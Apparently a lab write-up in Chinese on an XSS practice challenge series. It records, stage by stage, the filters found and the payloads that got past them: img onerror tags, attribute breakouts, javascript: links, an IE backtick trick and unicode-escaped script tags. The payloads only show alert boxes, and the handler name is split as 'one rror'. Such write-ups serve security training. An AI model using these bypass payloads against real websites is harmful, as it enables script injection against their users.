1.
没有过滤
<img src=1 one rror=alert(document.domain)>2.
输入第一关的payload
查看源码
"><img src=1 one rror=alert(document.domain)>3.
发现字符被转义
抓包,发现有两个参数
修改第二个参数
4.
抓包发现有三个参数
修改第三个参数
发现还是没有弹窗,查看源码
修改第三个参数
5.
发现限制了输入框的长度
查看元素,修改长度
6.
发现没有过滤引号,但是尖括号被HTML实体转义了
使用事件触发XSS
7.
没有引号,使用事件
8.
href 可以使用伪协议,然后点击
javascript:alert(document.domain)10.
发现domain被过滤了
11.
过滤了事件
<script>标签也不行
想到还可以使用javascript伪协议
发现s还是有问题,于是先编码试试
"><a href=javascript:alert(document.domain)>1</a>12.
去网上找了找大佬们写的,发现使用`,在IE下解析成引号
15.
dom型
输入<img src=1 one rror=alert(1)>
发现过滤了<>输入在<script>标签中,使用编码
\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003ealert(document.domain)\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e输入之后\都被过滤了
\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e16.
\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e